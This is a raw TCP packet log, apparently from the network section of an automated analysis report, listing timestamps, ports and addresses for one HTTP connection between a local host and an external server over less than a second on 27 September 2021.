Sep 27, 2021 23:55:29.098586082 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098588943 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.098624945 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098668098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098670959 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.098694086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098731995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098742008 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.098772049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098810911 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098817110 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.098846912 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098886967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098891020 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.133341074 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133368015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133459091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133511066 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.133534908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.133704901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133779049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133817911 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133835077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133841038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.133867979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133902073 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.133946896 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.133972883 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.133989096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.134030104 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.134048939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.134058952 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.134094000 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.134100914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.134156942 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.134180069 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.134232998 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.134408951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.134480953 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.168723106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.168754101 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.168776035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.168796062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.168823004 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.168853998 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.168872118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.168875933 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.168981075 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.168998957 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.169147015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.169204950 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.169286013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.169303894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.169352055 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.169353962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205141068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205172062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205195904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205229044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205244064 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.205246925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205265999 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.205270052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205288887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205307007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205317020 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.205327034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205339909 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.205375910 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.205384016 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.239824057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.239873886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.239959955 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.240223885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.240295887 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.240375042 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.240425110 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.240475893 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.240511894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.240540981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.240583897 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.240592003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.240655899 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.240686893 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.240712881 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.242746115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.242844105 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.242882013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.275856972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.275935888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.275943041 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.275964975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.276010036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.276012897 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.276523113 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.276556015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.276597023 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.276599884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.276657104 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.276660919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.276689053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.276734114 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.276787043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.278110981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.278139114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.278243065 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.311263084 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311321974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311362028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311404943 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.311408997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311429977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311460018 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.311474085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311517000 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.311575890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311615944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311628103 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.311655045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.311702013 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.311760902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.312777996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.312880993 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.312911987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.345988035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.346077919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.346080065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.346626043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.346721888 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.346905947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347181082 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347199917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347228050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347234011 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347242117 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.347245932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347261906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347280979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347280979 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.347306967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.347330093 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.384361982 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384411097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384432077 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.384682894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384704113 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384722948 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384749889 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.384820938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384821892 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.384844065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384875059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384892941 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384908915 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.384910107 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384929895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384938002 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.384948015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.384991884 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.421633005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.421701908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.421896935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422049999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422103882 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.422224045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422523975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422542095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422559023 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422576904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422575951 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.422595024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422599077 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.422616005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422633886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422640085 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.422652006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422678947 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.422698021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422713995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.422743082 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.456110954 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.456140041 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.456254959 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.456681967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.456701994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.456785917 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.458168030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458209991 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458234072 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458318949 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.458357096 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.458394051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458410025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458427906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458444118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458492041 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.458528996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458528996 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.458545923 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458564043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.458601952 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.491142035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.491178036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.491211891 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.491352081 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.491420984 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.491540909 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.492696047 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.492721081 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.492738962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.492769003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.492809057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.492809057 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.492837906 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.492851973 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.492886066 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.492923975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.492984056 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.492999077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.493017912 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.493040085 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.493072033 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.526293039 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.526319027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.526335955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.526359081 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.526416063 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.526454926 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.527436972 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.527488947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.527522087 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.527702093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.527772903 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.527780056 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.527796984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.527822971 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.527847052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.527853012 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.527899027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.527949095 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.527986050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.528038025 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.528043985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.561340094 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.561419964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.561464071 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.561469078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.561492920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.561531067 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.561553001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.561599970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.561604977 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.562742949 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.562796116 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.562839985 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.562864065 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.562889099 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.562906981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.563044071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.563088894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.563091993 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.563155890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.563198090 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.563210964 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.596916914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.596946955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.596967936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.596982956 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.596992970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.597017050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.597031116 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.597073078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.597075939 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.597498894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.597554922 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.597600937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.597975016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.597995996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.598050117 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.598181009 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.598237991 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.598378897 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.598408937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.598453999 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.598457098 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.635376930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635438919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.635612965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635632038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635648966 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635660887 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.635667086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635685921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635693073 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.635703087 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635720015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635730028 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.635736942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635756969 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635776997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635792971 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635801077 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.635811090 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635821104 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.635828018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.635854959 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.635898113 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.671232939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671260118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671272993 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671295881 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671319008 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671341896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671364069 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671367884 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.671392918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671427965 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.671454906 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.671462059 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.671463966 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671479940 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671499014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.671535969 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.671550989 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.705739975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.706020117 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.706116915 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.706197977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.706444979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.706513882 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.706525087 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.706584930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.706635952 CEST	49745	80	192.168.2.3	185.138.164.150
